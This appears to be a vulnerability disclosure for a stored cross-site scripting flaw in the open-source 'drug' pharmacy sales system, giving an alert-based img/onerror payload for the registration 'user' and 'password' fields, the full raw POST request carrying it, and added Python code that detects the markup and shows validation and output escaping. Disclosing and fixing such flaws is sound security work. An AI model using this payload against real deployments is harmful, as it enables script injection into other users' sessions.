Project Introduction
drug is a pharmacy sales management system. Project address: https://github.com/deathbreak/drug
Vulnerability Analysis
\drug\src\main\java\com\controller\ClerkController.java

Following the "Manager" class at \drug\src\main\java\com\bean\Manager.java, the "user" and "password" parameters are not filtered, so crafted values can be submitted to perform XSS attacks.

After setting up the test site locally, visit the system registration page. The "user" (username) and "password" parameters are vulnerable: enter the payload "><img src=1 onerror=alert(/xss/)> into the "user" or "password" field and register as a user.


Request packet
POST /drug/register_user HTTP/1.1
Host: 192.168.152.185:8080
Cache-Control: max-age=0
Origin: http://192.168.152.185:8080
Referer: http://192.168.152.185:8080/drug/register
Accept-Language: zh-CN,zh;q=0.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Upgrade-Insecure-Requests: 1
Cookie: JSESSIONID=265273BF778DCA81E538DFEA75D7878C
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Length: 82
user=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28%2Fxss%2F%29%3E&password=123456&role=0
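The following is an added example, not code from the drug project: it decodes the body of the registration request above, flags the parameter carrying markup, and shows the two controls the register handler lacks, a username whitelist (the 3-20 character alphanumeric policy is an assumption, the project defines none) and HTML output encoding of the stored value.

```python
# Added example (not part of the drug project): parse the captured
# registration request body, flag the stored-XSS payload, and show the
# two fixes the controller lacks: input validation and output encoding.
import html
import re
from urllib.parse import parse_qs

# Body of the POST /drug/register_user request shown above (constructed copy).
SAMPLE_BODY = (
    "user=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28%2Fxss%2F%29%3E"
    "&password=123456&role=0"
)

# Assumed username policy: letters, digits, underscore, 3-20 characters.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{3,20}$")
# Characters that make a value dangerous when placed into HTML unencoded.
MARKUP_CHARS = set('<>"\'&')


def decode_form(body: str) -> dict:
    """URL-decode an application/x-www-form-urlencoded body into single values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def find_markup_params(body: str) -> list:
    """Detection: names of parameters whose decoded value contains markup characters."""
    form = decode_form(body)
    return sorted(name for name, value in form.items() if MARKUP_CHARS & set(value))


def validate_username(user: str) -> bool:
    """Input validation the register handler should apply before saving 'user'."""
    return bool(USERNAME_RE.fullmatch(user))


def render_username(user: str) -> str:
    """Output encoding: what a page should emit when it displays a stored username."""
    return html.escape(user, quote=True)


if __name__ == "__main__":
    form = decode_form(SAMPLE_BODY)
    print("decoded user:", form["user"])
    print("flagged     :", find_markup_params(SAMPLE_BODY))
    print("valid?      :", validate_username(form["user"]))
    print("escaped     :", render_username(form["user"]))
```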
